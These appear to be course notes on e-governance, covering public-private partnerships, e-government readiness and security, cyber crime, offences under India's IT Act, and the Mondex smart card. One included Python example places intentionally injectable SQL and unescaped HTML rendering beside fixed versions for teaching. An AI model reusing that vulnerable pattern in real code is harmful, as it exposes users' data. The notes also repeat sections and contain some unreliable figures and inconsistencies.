A public-private partnership exists when public sector agencies (federal, state or local) join with private sector entities (companies, foundations, academic institutions or citizens) and enter into a business relationship to attain a commonly shared goal that also achieves the objectives of the individual partners.

Why do them?

• Fiscal Head Room
• As a Way of Financing the Project
• Separate Policy & Regulation from Operations
• Make the Good or Service Available
• Pay for Performance and Output
• Introduce Competition – For and In the Market


The Need to Set the Right Priorities –

Four Basic Dimensions of P3

Although each is unique, all P3s include four basic characteristics:
• Shared goals
• Shared resources (time, money, expertise, people)
• Shared risks
• Shared benefits

Benefits
• Expedited project completion
• Project cost savings
• Improved quality
• Use of private resources
• Access to new sources of private capital

Two Major Steps
• Crafting the Partnership
• Implementing the Partnership

Project Management - Six Distinct Phases

1. Genesis
   • What's the need?
   • What's driving the need (rationale)? Facility non-compliance, natural disaster, budget deficit
   • Is there a need for a Public/Private Partnership?
   • Preliminary Project Definition

2. Feasibility
   • Is a Public/Private Partnership feasible, not only financially but practically? Can it be done?
   • Market Research
   • Economic/Financial Analysis
   • Program, Budget and Schedule
   • Risk Analysis

3. Plan and Test
   • Final project definition
   • What is the best way to complete the project?
   • Has the plan been thoroughly tested to assess market demand, public and stakeholder feedback, and economics?
   • Master Schedule/Budget
   • Political Climate
   • Any potential "fatal flaws" that could derail the project?

4. Procurement and Contracting
   • How do you choose and contract with the best-value private partner?
   • What's the best delivery method?
     – Design-Bid-Build
     – Design-Build
     – Finance-Design-Build
   • What do current statutes allow?
   • Procurement Approach: Sole Source, RFP, Low Bid
   • Risk Allocation between Public and Private Partners
   • Structuring of Contract/Risks and Rewards

5. Implement
   • Environmental
   • Design
   • Permitting
   • Construction
   • Commissioning and Administration

6. Operate
   • Startup
   • Monitoring
   • Assessment
   • Enhancement
   • Contract Modifications
   • Contract Renegotiations

READINESS IN E-GOVERNANCE

A high level of readiness to develop and implement e-government services is a prerequisite for a high-performing and innovative public sector that delivers integrated services, making life easier for citizens and businesses. E-government readiness is therefore a significant indicator of whether a country is prepared to harvest the efficiencies gained from ICT-enabled public administrations.

The UN's e-government readiness index is a combined indicator of the supply of, potential demand for, and maturity of e-government services. OECD member countries exhibit a high capacity to develop and implement e-government services. This is generally characterized by an extensive broadband infrastructure, a repository of electronic information on government laws and policies (including links to archived information and downloadable forms), and a high level of comfort with ICT among citizens and businesses. Countries with the highest readiness index also tend to have a large number of transactional and e-commerce features on their government websites. As noted by the UN in its 2008 e-government survey, the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (e.g. the accessibility and penetration of the electronic infrastructure) and strategies (e.g. the online provision of services). Each country has two main government websites: one that is informative and another that is a gateway for e-government services. In addition, citizens and businesses are able to access many services and complete many transactions online. However, similar levels of e-government readiness can also result from different strategic approaches.

Internet access is a prerequisite for citizens and businesses to use e-government services, and thus a leading indicator of countries' readiness to harness the potential efficiencies of ICT. Broadband penetration has increased dramatically in most OECD member countries in the past five years, as countries have made significant investments in their telecommunications infrastructure.

SECURITY ISSUES IN E-GOVERNANCE

1. INTRODUCTION

The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions. In particular, the networking potential offered by the Internet and related technologies has the potential to transform the structures and operation of government.

The effective management of information security is a key factor, as the willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have in the data security of this service.

2. INFORMATION SECURITY

A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens.

The process approach for an information security management system (ISMS) encourages its users to emphasize the importance of:

• understanding an organization's information security requirements and the need to establish policy and objectives for information security;
• implementing and operating controls to manage an organization's information security risks in the context of the organization's overall business risks;
• monitoring and reviewing the performance and effectiveness of the ISMS;
• continual improvement based on objective measurement.

Data security requires a set of security requirements:

• Authentication: the capability to identify who is using the services (person or software program); the process of verifying that you are who you say you are.
• Authorization: the capability to give access rights to resources; the process of verifying that someone has the rights to do what she is trying to do.
• Confidentiality: the capability to prevent unauthorized access to information.
• Integrity: the capability to prevent information from unauthorized modification, ensuring that information can be relied upon and is accurate and complete.
• Traceability: the capability to chronologically interrelate any transaction to the person or system that performed the action, in a way that is verifiable.
• Non-repudiation: the capability to prevent the intervening person or system in an event or action from denying or challenging their participation in the event.

Examples of organizational and technical measures to prevent unauthorized access and processing are:

• Protecting premises, equipment and systems software, including input-output units
• Protecting software applications used to process personal data
• Preventing unauthorized access to personal data during transmission thereof, including transmission via telecommunication means and networks
• Ensuring effective methods of blocking, destruction, erasure or anonymization of personal data
• Enabling subsequent determination of when individual personal data were entered into a filing system, used or otherwise processed, and the person responsible, for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data

Although trusted security and privacy measures constitute a crucial success factor for e-Government, this has not yet been addressed: as the UN 2012 Survey shows, only 20% of national portals clearly indicate the presence of security features. Europe is leading, with 44 countries displaying secure links on their national websites, but the survey does not consider regional and local websites, nor the many decentralized public organization web portals.

3. INFORMATION SECURITY THREATS

Services provided by e-Government to citizens, enterprises, public officers, government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats. Detailed examples of cyber attacks involve techniques like packet sniffers, probes, malware, internet infrastructure attacks, denial of service attacks, remote-to-local attacks and user-to-root attacks. The successful adoption of an ISMS is important to protect information assets, allowing an organization to:

• Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis;
• Maintain a structured and comprehensive framework for identifying and assessing information security risks, selecting and applying applicable controls, and measuring and improving their effectiveness;
• Continually improve its control environment;
• Effectively achieve legal and regulatory compliance.

There are simple and well-known web application vulnerabilities that could be avoided, but e-Government websites are still vulnerable. A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection. An SQL injection attack can compromise data integrity, while XSS is a vulnerability which attackers may exploit to steal users' information.
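To make the two vulnerabilities concrete from the defender's side, here is an added Python example (not code from these notes or from any real portal) that places a vulnerable citizen lookup beside its hardened form: parameter binding for the SQL case and output escaping for the XSS case. The table, column names and sample rows are constructed, and the whole thing runs against an in-memory SQLite database.

```python
"""Vulnerable and hardened lookups for an e-Government style citizen portal.

Added illustration, not code from the page or from any real portal. It runs
against an in-memory SQLite table with constructed sample rows. The unsafe
lookup concatenates user input into the SQL text, so the input reaches the
SQL parser; the safe lookup binds it as a parameter. Output escaping shows
the fix for reflected XSS when a stored name is rendered back to a browser.
"""
import html
import re
import sqlite3

# Constructed sample data; the apostrophe in O'Brien is ordinary user data.
SAMPLE_ROWS = [
    ("C-1001", "Asha Verma", "asha@example.invalid"),
    ("C-1002", "Liam O'Brien", "liam@example.invalid"),
]

CID_PATTERN = re.compile(r"C-\d{4}")  # assumed shape of a citizen id


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE citizen (cid TEXT PRIMARY KEY, name TEXT, email TEXT)")
    conn.executemany("INSERT INTO citizen VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_by_name_unsafe(conn, name):
    """Vulnerable pattern: the name is pasted into the statement text."""
    sql = f"SELECT cid, email FROM citizen WHERE name = '{name}'"
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.OperationalError as exc:
        # The input altered the statement itself; even a legitimate name breaks it.
        return f"SQL error: {exc}"


def lookup_by_name_safe(conn, name):
    """Hardened: placeholder binding; the driver passes name as data, never as SQL."""
    return conn.execute(
        "SELECT cid, email FROM citizen WHERE name = ?", (name,)
    ).fetchall()


def validate_cid(cid):
    """Defence in depth for identifier inputs: accept only the documented shape."""
    return CID_PATTERN.fullmatch(cid) is not None


def lookup_by_cid(conn, cid):
    """Validate first, then bind; anything that is not a citizen id is rejected."""
    if not validate_cid(cid):
        return []
    return conn.execute(
        "SELECT name, email FROM citizen WHERE cid = ?", (cid,)
    ).fetchall()


def render_greeting_unsafe(name):
    """Vulnerable: stored data inserted into HTML verbatim."""
    return f"<p>Welcome, {name}</p>"


def render_greeting_safe(name):
    """Hardened: escape on output so any markup in the data stays inert text."""
    return f"<p>Welcome, {html.escape(name, quote=True)}</p>"


if __name__ == "__main__":
    db = make_db()
    print(lookup_by_name_unsafe(db, "Liam O'Brien"))  # SQL error: the quote reached the parser
    print(lookup_by_name_safe(db, "Liam O'Brien"))    # [('C-1002', 'liam@example.invalid')]
    print(render_greeting_safe("Asha <b>Verma</b>"))  # markup rendered as text, not HTML
```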

Specific security measures like firewalls, intrusion detection software, encryption and secure networks must be defined, designed and implemented for government agencies to provide the appropriate levels of security. But information security must also take into consideration the people and processes that rely on the systems. Employees with daily access to e-Government systems must be trained on cybersecurity, and this aspect must become part of their job. A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies.


CYBER CRIME AND LAWS

The expression 'Crime' is defined as an act which subjects the doer to legal punishment, or any offence against morality, social order, or any unjust or shameful act. "Offence" is defined in the Code of Criminal Procedure to mean an act or omission made punishable by any law for the time being in force.

Cyber Crime is emerging as a serious threat. Worldwide, governments, police departments and intelligence units have started to react.

Cyber Crime is a term used to broadly describe criminal activity in which computers or computer networks are a tool, a target, or a place of criminal activity, and includes everything from electronic cracking to denial of service attacks. It is also used to include traditional crimes in which computers or networks are used to enable the illicit activity.

Computer crime mainly consists of unauthorized access to computer systems, data alteration, data destruction, and theft of intellectual property. Cyber crime in the context of national security may involve hacking, traditional espionage, or information warfare and related activities.

Pornography, Threatening Email, Assuming someone's Identity, Sexual Harassment, Defamation, Spam and Phishing are some examples where computers are used to commit crime, whereas Viruses, Worms and Industrial Espionage, Software Piracy and Hacking are examples where computers become the target of crime.

Cyber Crime Variants

Hacking

Hacking is a crime which entails cracking systems and gaining unauthorized access to the data stored in them. Hacking had witnessed a 37 per cent increase this year.

Cyber Squatting

Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune. This is an issue that has not been tackled in IT ACT 2000.

Phishing

Phishing is just one of the many frauds on the Internet trying to fool people into parting with their money. Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions, requesting them to enter their Username, Password or other personal information to access their Account for some reason. The fraudster then has access to the customer's online bank account and to the funds contained in that account.

Cyber Stalking

Cyber Stalking is the use of the Internet or other electronic means to stalk someone. This term is used interchangeably with online harassment and online abuse. Stalking generally involves harassing or threatening behaviour that an individual engages in repeatedly, such as following a person, appearing at a person's home or place of business, making harassing phone calls, leaving written messages or objects, or vandalizing a person's property.


Vishing
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access to private personal and financial information from the public for the purpose of financial reward. The term is a combination of "Voice" and "phishing". Vishing exploits the public's trust in landline telephone services. Vishing is typically used to steal credit card numbers or other information used in identity theft schemes from individuals.

A rapidly growing online user base:
• 121 Million Internet Users
• 65 Million Active Internet Users, up by 28% from 51 million in 2010
• 50 Million users shop online on Ecommerce and Online Shopping Sites
• 46+ Million Social Network Users
• 346 million mobile users had subscribed to Data Packages


CYBER LAW

(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or Damage to the public or any person, Destroys or Deletes or Alters any Information Residing in a Computer Resource or diminishes its value or utility or affects it injuriously by any means, commits hack.

(2) Whoever commits hacking shall be punished with imprisonment up to three years, or with fine which may extend up to two lakh rupees, or with both.

Whoever without permission of the owner of the computer:
• Secures Access
• Downloads, Copies or extracts any data, computer database or any information
• Introduces or causes to be introduced any Virus or Contaminant
• Disrupts or causes disruption
• Denies or causes denial of access to any person
• Provides any assistance to any person to facilitate access
• Charges the services availed of by a person to the account of another person by Tampering with or Manipulating any Computer, Computer System or Computer Network
shall be liable to pay damages by way of compensation not exceeding one crore rupees to the person so affected.

Section – 43
• Destroys, Deletes or Alters any Information residing in a computer resource or diminishes its value or utility or affects it injuriously by any means
• Steals, conceals, destroys or alters, or causes any person to steal, conceal, destroy or alter any computer source code used for a computer resource with an intention to cause damage

"If any person dishonestly or fraudulently does any act referred to in section 43, he shall be punishable with imprisonment for a term which may extend to two three years or with fine which may extend to five lakh rupees or with both." [S66]

S66A - Punishment for sending offensive messages through communication service, etc.

Any person who sends, by means of a computer resource or a communication device:
• Any information that is grossly offensive or has menacing character; or
• Any information which he knows to be false, but for the purpose of causing annoyance, inconvenience, danger, obstruction, insult, injury, criminal intimidation, enmity, hatred or ill will, persistently makes by making use of such computer resource or a communication device;
• Any electronic mail or electronic mail message for the purpose of causing annoyance or inconvenience or to deceive or to mislead the addressee or recipient about the origin of such messages;
shall be punishable with imprisonment for a term which may extend to three years and with fine.

S 66C - Punishment for identity theft

"Whoever fraudulently or dishonestly makes use of the electronic signature, password or any other unique identification feature of any other person shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to rupees one lakh."

S 66D - Punishment for cheating by personation by using computer resource

"Whoever by means of any communication device or computer resource cheats by personation shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to one lakh rupees."

S 66E - Punishment for violation of privacy

"Whoever intentionally or knowingly captures, publishes or transmits the image of a private area of any person without his or her consent, under circumstances violating the privacy of that person, shall be punished with imprisonment which may extend to three years or with fine not exceeding two lakh rupees, or with both."

S 67 A - Punishment for publishing or transmitting of material containing sexually explicit act, etc., in electronic form

"Whoever publishes or transmits or causes to be published or transmitted in the electronic form any material which contains sexually explicit act or conduct shall be punished on first conviction with imprisonment of either description for a term which may extend to five years and with fine which may extend to ten lakh rupees."

S 67 C - Preservation and Retention of information by intermediaries

"(1) Intermediary shall preserve and retain such information as may be specified for such duration and in such manner and format as the Central Government may prescribe.
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub-section (1) shall be punished with an imprisonment for a term which may extend to three years and shall also be liable to fine."


IT ACT

The Information Technology Act, 2000 (also known as ITA-2000, or the IT Act) is an Act of the Indian Parliament (No. 21 of 2000) notified on October 17, 2000. This act is being opposed by the Save Your Voice campaign and other civil society organizations in India. User-review and consumer social networking site MouthShut.com has filed a writ petition in the Supreme Court of India to repeal and nullify parts of IT Act 2000.

The United Nations General Assembly, by resolution A/RES/51/162 dated the 30 January 1997, has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission on International Trade Law. This is referred to as the UNCITRAL Model Law on E-Commerce. Following the UN Resolution, India passed the Information Technology Act 2000 in May 2000, which came into force on October 17, 2000. The Information Technology Act 2000 has been substantially amended through the Information Technology (Amendment) Act 2008, which was passed by the two houses of the Indian Parliament on December 23 and 24, 2008. It got the Presidential assent on February 5, 2009 and came into force on October 27, 2009. The amended Act has provided additional focus on information security. It has added several new sections on offences including cyber terrorism and data protection. A set of Rules related to sensitive personal information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was notified in April 2011.

Provisions –

Information Technology Act 2000 consisted of 94 sections segregated into 13 chapters. Four schedules form part of the Act. In the 2008 version of the Act there are 124 sections (excluding 5 sections that have been omitted from the earlier version) and 14 chapters. Schedules I and II have been replaced. Schedules III and IV are deleted.

Information Technology Act 2000 addressed the following issues:
1. Legal recognition of electronic documents
2. Legal recognition of digital signatures
3. Offenses and contraventions
4. Justice dispensation systems for cybercrimes

Offences –

Section 65 – Offence: Tampering with computer source documents (intentional concealment, destruction or alteration of source code when the computer source code is required to be kept or maintained by law for the time being in force). Punishment: imprisonment up to three years, or/and with fine up to 2 lakh rupees.

Section 66 – Offence: Hacking. Punishment: imprisonment up to three years, or/and with fine up to 5 lakh rupees.

Section 66-A – Offence: Sending offensive message through electronic means (sending any information through an electronic message that is grossly offensive or has menacing character and might cause insult, injury, criminal intimidation, enmity, hatred or ill will, etc., or sending such mail intended to deceive or to mislead the addressee or recipient about the origin of such messages). Punishment: imprisonment up to three years and with fine.

Criticisms –

The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December 2008 with no discussion in the House. Some of the cyber law observers have criticized the amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil liberties of Indians. There has also been appreciation of the amendments from many observers because they address the issue of Cyber Security.

Section 69 empowers the Central Government/State Government and its authorized agency to intercept, monitor or decrypt any information generated, transmitted, received or stored in any computer resource if it is necessary or expedient so to do in the interest of the sovereignty or integrity of India, defence of India, security of the State, friendly relations with foreign States or public order, or for preventing incitement to the commission of any cognizable offence, or for investigation of any offence. They can also secure assistance from computer personnel in decrypting data (see mandatory decryption) under penalty of imprisonment.

Section 66A is widely criticized. It has led to numerous abuses reported by the press. Section 66A has also been criticised and challenged in the Lucknow and Madras High Courts for its constitutional validity. Based on Section 66A, the Bombay High Court has held that creating a website and storing false information on it can entail cyber crime.


ADVANTAGES

CONSUMER –
• Convenience
• Accessibility
• On-chip record of recent transactions
• Home load
• Internet purchases

MERCHANT –
• Reliable off-line payment
• Higher security
• Low transaction cost
• Reduced cash handling

FINANCIAL INSTITUTION –
• Strengthen customer relationships
• New financial and commercial partnerships

Mondex is a concept for an electronic payment system that provides an alternative to cash, particularly small currency and coins (micro-payment). The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK.

In July 1996, initiated by NatWest and Midland Bank PLC, Mondex International Ltd was officially established by 17 major banks from North America, Asia/Pacific and Europe, and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept, technology and brand. In the same year, MasterCard International acquired 51% ownership of Mondex International and fully endorsed the Mondex technology architecture.

How does Mondex Protect Privacy? –

Principles protected:
o Limits for collecting personal information
o Limits for using, disclosing and keeping personal information
o Keeping personal information accurate
o Safeguarding personal information


Limits for collecting personal information
o loads from account
o deposits into account
o lost transactions

Limits for using, disclosing and keeping personal information
o safeguard deposits
o to reimburse for non-performance

Keeping personal information accurate
o load and unload are online
o rolling 10 transactions provides exact spend and retailer name

Safeguarding personal information
o firewalls in Multos – between applications – ITSEC 6 designation
o transaction data to retailer is deliberately limited
o individual transaction data is not collected by banks – Mondex is an unaudited system


The design of a Mondex smart card allows end users to transfer funds electronically onto the card and then utilize the Mondex smart card to make purchases up to the total cash value held on the card. Mondex smart cards provide an electronic payment system using all the capabilities associated with smart card technology. The Mondex smart card can be a convenient alternative to cash.

Although the design was five years old at the time, the Mondex smart card was actually launched in 1995 – two years before MasterCard assumed control of the technology.

The banks that currently support the Mondex smart card include National Bank of Canada, Scotiabank, Canada Trust, Bank of Montreal, Le Mouvement des caisses Desjardins and Toronto Dominion Bank. With so many respected lending institutions banking on the idea, the Mondex smart card is worth a closer look.

The Mondex smart card has the ability to make card-to-card transfers, which is not possible with standard credit or debit cards. When you use a credit/debit card to make a purchase, communication is required between the bank and your card. However, Mondex cards contain an embedded microprocessor with sophisticated encryption methods and tamper-proof hardware designed to protect them from hackers. The ability of the Mondex smart card to do offline transactions means they are less dependent on expensive network infrastructure, reducing transaction costs. Offline transactions may seem anonymous; however, they actually are recorded in the digital memory of the card's microprocessor and remain retrievable the next time the card is used at an ATM or as soon as the retailer uploads transaction data to the bank computer.

A significant disadvantage with Mondex is that transactions aren't truly anonymous. Unlike pre-paid phone cards, which are also based on smart card technology, you can't purchase a Mondex card without revealing your identity. Each card has a unique identification number through which owners can easily be identified. Mondex smart cards have not been as successful as originally predicted. Customers have not been especially satisfied with the card and its services. Unlike a credit or debit card, your money may be lost forever if you should lose a Mondex smart card. Losing a Mondex card is just like losing a wallet full of cash. With a credit card, you're protected against any loss exceeding $50. This protection is not currently available with a Mondex smart card.

According to the Mondex smart card system, it is fully auditable. There is a log of the time, date, amount and participants of each transaction, which hampers the privacy of users. Technically, however, Mondex can't claim to be a fully auditable system. After a number of transactions, overflow can occur as a result of limited memory in the Mondex smart-cards. This means that significant data may be lost before Mondex is able to retrieve it. Critics say this loss of data is a critical design flaw, making it difficult for Mondex to reliably detect fraud.

While Mondex smart cards are not a hundred percent secure, they do possess the ability to tolerate minor fraud loss.

Mondex believes their electronic payment system is secure. They are convinced that critics who have voiced concern over security issues are mistaken and misinformed. Perhaps the use of a Mondex smart card depends on a personal level of trust.
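The audit gap described above (offline card-to-card payments, a rolling on-card log of the last 10 transactions, and overflow before the bank next sees the card) can be made concrete with a small model. This is an added example, not Mondex's own code; the card ids, amounts, retailer name and the assumption that the log capacity equals the "rolling 10 transactions" are constructed for illustration.

```python
"""Toy stored-value card with a rolling transaction log (added illustration).
Shows why a bank cannot fully audit offline card-to-card payments once the
on-card log overflows before the card is next seen at an ATM or retailer upload."""
from collections import deque
from dataclasses import dataclass, field
from itertools import count

LOG_CAPACITY = 10          # assumed: the "rolling 10 transactions" kept on the card
_tx_ids = count(1)         # monotonically increasing transaction ids


@dataclass
class Transaction:
    tx_id: int
    kind: str              # "load", "pay" or "receive"
    counterparty: str      # bank, retailer name or other card id
    amount: int            # signed, in the smallest currency unit


@dataclass
class Card:
    card_id: str           # unique identification number tied to the owner
    balance: int = 0
    # The oldest entry is silently discarded when the log is full: the overflow flaw.
    log: deque = field(default_factory=lambda: deque(maxlen=LOG_CAPACITY))

    def _record(self, kind, counterparty, amount):
        tx = Transaction(next(_tx_ids), kind, counterparty, amount)
        self.log.append(tx)
        return tx


@dataclass
class BankView:
    """What the bank knows about one card from its last online contact."""
    balance: int = 0
    last_tx_id: int = 0


def load(card, bank_view, amount):
    """Online load from the account: the bank sees the new balance immediately."""
    if amount <= 0:
        raise ValueError("load amount must be positive")
    card.balance += amount
    tx = card._record("load", "bank", amount)
    bank_view.balance = card.balance
    bank_view.last_tx_id = tx.tx_id


def transfer(payer, payee, amount, retailer_name):
    """Offline card-to-card payment: no bank contact, limited to the value on the card."""
    if amount <= 0 or amount > payer.balance:
        raise ValueError("payment exceeds value held on the card")
    payer.balance -= amount
    payee.balance += amount
    payer._record("pay", retailer_name, -amount)
    payee._record("receive", payer.card_id, amount)


def upload(card, bank_view):
    """Bank retrieves the card's log (ATM visit or retailer upload) and reconciles.
    Returns (new_records, gap). gap == 0 means every change in value since the last
    contact is explained by a logged record; gap != 0 means records were lost to
    overflow (or the card was tampered with), and the bank cannot tell which."""
    new_records = [t for t in card.log if t.tx_id > bank_view.last_tx_id]
    expected = bank_view.balance + sum(t.amount for t in new_records)
    gap = card.balance - expected
    bank_view.balance = card.balance
    if new_records:
        bank_view.last_tx_id = new_records[-1].tx_id
    return new_records, gap


def overflow_demo():
    """Constructed scenario: 3 payments audit cleanly; 12 payments before the next
    upload lose the two oldest records. Returns (records_seen, gap) per upload."""
    alice, bob = Card("card-0001"), Card("card-0002")   # constructed card ids
    bank_alice = BankView()
    load(alice, bank_alice, 1000)
    for _ in range(3):
        transfer(alice, bob, 10, "corner-shop")
    first = upload(alice, bank_alice)                    # 3 records, gap 0
    for _ in range(12):
        transfer(alice, bob, 10, "corner-shop")
    second = upload(alice, bank_alice)                   # only 10 records, gap -20
    return (len(first[0]), first[1]), (len(second[0]), second[1])


if __name__ == "__main__":
    print(overflow_demo())   # ((3, 0), (10, -20))
```

The non-zero gap on the second upload is all the bank learns: 20 units left the card without a surviving record, and nothing on the card says where they went.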

E-GOVERNANCE

Although the term 'e-Governance' has gained currency in recent years, there is no standard definition of this term. Different governments and organizations define this term to suit their own aims and objectives. Sometimes the term 'e-government' is also used instead of 'e-Governance'.

Several dimensions and factors influence the definition of e-governance or electronic governance. The word "electronic" in the term e-governance implies technology-driven governance. E-governance is the application of information and communication technology (ICT) for delivering government services, exchange of information, communication transactions, integration of various stand-alone systems and services between government-to-customer (G2C), government-to-business (G2B), government-to-government (G2G), as well as back office processes and interactions within the entire government framework. Through e-governance, government services will be made available to citizens in a convenient, efficient and transparent manner. The three main target groups that can be distinguished in governance concepts are government, citizens and businesses/interest groups. In e-governance there are no distinct boundaries.

Generally four basic models are available – government-to-citizen (customer), government-to-employees, government-to-government and government-to-business.

Difference between E-Government and E-Governance –

Both the terms are treated to be the same; however, there is some difference between the two. E-government is the use of the ICTs in public administration - combined with organizational change and new skills - to improve public services and democratic processes and to strengthen support to the public. The problem with this definition, as a congruent definition of e-governance, is that there is no provision for governance of ICTs. As a matter of fact, the governance of ICTs most probably requires a substantial increase in regulation and policy-making capabilities, with all the expertise and opinion-shaping processes among the various social stakeholders of these concerns. So the perspective of e-governance is the use of the technologies that both help governing and have to be governed. The Public-Private Partnership (PPP) based e-governance projects are hugely successful in India. United Telecoms Limited, known as UTL, is a major player in India on PPP based e-governance projects. Each project had mammoth state wide area networks in these states.

E-governance is the future many countries are looking forward to for a corruption-free government. E-government is a one-way communication protocol, whereas e-governance is a two-way communication protocol. The essence of e-governance is to reach the beneficiary and ensure that the services intended to reach the desired individual have been met with. There should be an auto-response to support the essence of e-governance, whereby the Government realizes the efficacy of its governance. E-governance is by the governed, for the governed and of the governed.

Establishing the identity of the end beneficiary is a challenge in all citizen-centric services. Statistical information published by governments and world bodies does not always reveal the facts. The best form of e-governance cuts down on unwanted interference of too many layers while delivering governmental services. It depends on a good infrastructural setup with the support of local processes and parameters for governments to reach their citizens or end beneficiaries. Budget for planning, development and growth can be derived from well laid out e-governance systems.

Why e-Governance?

E-Government can transform citizen service, provide access to information to empower citizens, enable their participation in government and enhance citizen economic and social opportunities, so that they can make better lives for themselves and for the next generation.

BASIC ARCHITECTURE

A suggested architecture for e-Governance is shown in the diagram, where it is illustrated that applications from various departments can be integrated together so as to be accessed by any terminal or computer from any other department or anywhere through the network. This is because of the characteristics of CORBA - it is a location transparent, language independent, implementation independent and Operating System independent architecture. The applications connected through CORBA/IIOP could be legacy applications wrapped to suit CORBA specifications, any new Web application, or even a database environment using Oracle, etc. Seamless interconnection, and thereby effective utility of the entire system of e-Governance, is possible if the middleware is designed to have the necessary services like Transactions, Data Base Management, Messaging and Naming.

Regarding security aspects, the CORBA Security standard is built around existing security specifications such as Distributed Computing Environment (DCE), the Kerberos Protocol and the Generic Security Service (GSS) API. While these technologies are heavily weighted, Public Key Security with Secure Sockets Layer (SSL) is popular with Internet based transactions.

Types of Interactions in e-Governance

e-Governance facilitates interaction between different stakeholders in governance. These interactions may be described as follows.

G2G (Government to Government)

In this case, Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities. This kind of interaction is only within the sphere of government and can be both horizontal, i.e. between different government agencies as well as between different functional areas within an organization, or vertical, i.e. between national, provincial and local government agencies as well as between different levels within an organization. The primary objective is to increase efficiency, performance and output.


G2C (Government to Citizens)

In this case, an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services. This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other. It gives citizens the choice of when to interact with the government (e.g. 24 hours a day, 7 days a week), from where to interact with the government (e.g. service centre, unattended kiosk or from one's home/workplace) and how to interact with the government (e.g. through internet, fax, telephone, email, face-to-face, etc.). The primary purpose is to make government citizen-friendly.

G2B (Government to Business)

Here e-Governance tools are used to aid the business community – providers of goods and services – to seamlessly interact with the government. The objective is to cut red tape, save time, reduce operational costs and to create a more transparent business environment when dealing with the government. The G2B initiatives can be transactional, such as in licensing, permits, procurement and revenue collection. They can also be promotional and facilitative, such as in trade, tourism and investment. These measures help to provide a congenial environment to businesses to enable them to perform more efficiently.

G2E (Government to Employees)

Government is by far the biggest employer and, like any organization, it has to interact with its employees on a regular basis. This interaction is a two-way process between the organization and the employee. Use of ICT tools helps in making these interactions fast and efficient on the one hand and increases satisfaction levels of employees on the other.

Difference between G2B and B2G

Government to business (G2B) - Refers to the conducting of transactions between government bodies and business via the internet.

Business to government (B2G) - Professional affairs conducted between companies and regional, municipal or federal governing bodies. B2G typically encompasses the determination and evaluation of proposals and completion of contracts.

PUBLIC PRIVATE PARTNERSHIPS

• Agreement between Government and the Private Sector for the Provision of a Public Good or Service by the Latter
• Generally, but not always, involving:
  – Long Term Contracts
  – User Charges and/or Payments flowing between the Parties
  – Shared Investments, but Mainly Private
  – Risk Sharing by the Parties
• Must be a Partnership

A public-private partnership exists when public sector agencies (federal, state or local) join with private sector entities (companies, foundations, academic institutions or citizens) and enter into a business relationship to attain a commonly shared goal that also achieves objectives of the individual partners.

Why do them?
• Fiscal Head Room
• As a Way of Financing the Project
• Separate Policy & Regulation from Operations
• Make the Good or Service Available
• Pay for Performance and Output
• Introduce Competition – For and In the Market


The Need to Set the Right Priorities –

Four Basic Dimensions of P3

Although each is unique, all P3's include four basic characteristics:
• Shared goals
• Shared resources (time, money, expertise, people)
• Shared risks
• Shared benefits

Benefits
• Expedited project completion
• Project cost savings
• Improved quality
• Use of private resources
• Access to new sources of private capital

Two Major Steps
• Crafting the Partnership
• Implementing the Partnership

Project Management - Six Distinct Phases

Genesis
• What's the need?
• What's driving the need / rationale? Facility non-compliance, natural disaster, budget deficit
• Is there a need for a Public/Private Partnership?

Preliminary Project Definition
• Feasibility: Is a Public/Private Partnership feasible, not only financially but practically? Can it be done?
• Market Research
• Economic/Financial Analysis
• Program, Budget and Schedule
• Risk Analysis

Plan and Test
• Final project definition: What is the best way to complete the project?
• Has the plan been thoroughly tested to assess market demand, public and stakeholder feedback, and economics?
• Master Schedule/Budget
• Political Climate
• Any potential "fatal flaws" that could derail the project?

Procurement and Contracting
• How do you choose and contract with the best-value private partner?
• What's the best delivery method? Design-Bid-Build, Design-Build, Finance-Design-Build
• What do current statutes allow?
• Procurement Approach: Sole Source, RFP, Low Bid
• Risk Allocation between Public and Private Partners
• Structuring of Contract / Risks and Rewards

Implement
• Environmental
• Design
• Permitting
• Construction
• Commissioning and Administration

Operate
• Startup
• Monitoring
• Assessment
• Enhancement
• Contract Modifications
• Contract Renegotiations

READINESS IN E-GOVERNANCE

A high level of readiness to develop and implement e-government services is a prerequisite for a high-performing and innovative public sector that delivers integrated services, making life easier for citizens and businesses. E-government readiness is therefore a significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations.

